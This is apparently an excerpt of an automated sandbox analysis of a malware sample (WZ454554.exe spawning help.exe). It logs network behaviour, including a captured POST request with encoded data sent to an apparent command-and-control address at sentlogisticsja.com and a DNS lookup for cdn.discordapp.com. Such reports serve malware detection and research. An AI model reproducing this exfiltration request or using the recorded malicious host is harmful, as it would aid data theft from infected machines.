71 55 31 52 59 6f 73 38 68 63 7e 4f 51 6e 63 4f 76 44 4f 46 6f 6f 74 53 28 7a 5a 4d 64 42 78 30 57 2d 56 69 4c 78 37 51 69 58 63 58 46 63 48 56 63 44 72 41 42 66 50 76 4a 53 43 58 39 6a 47 32 53 56 4d 58 71 66 4c 61 63 47 44 6d 6a 4c 74 70 7a 65 32 63 59 52 71 6f 70 31 41 6a 68 66 63 79 69 5f 70 55 4c 4c 58 76 44 66 63 38 43 61 62 57 47 66 65
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750 Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
 Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 19:23:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: Forbidden

Access Forbidden

 URLs found in memory or binary data Show sources
 Source: WZ454554.exe, 00000002.00000003.285422442.0000000000878000.00000004.00000001.sdmp, WZ454554.exe, 00000002.00000003.285452298.0000000000878000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp String found in binary or memory: http://www.sentlogisticsja.com Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp String found in binary or memory: http://www.sentlogisticsja.com/m9g2/
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: cdn.discordapp.com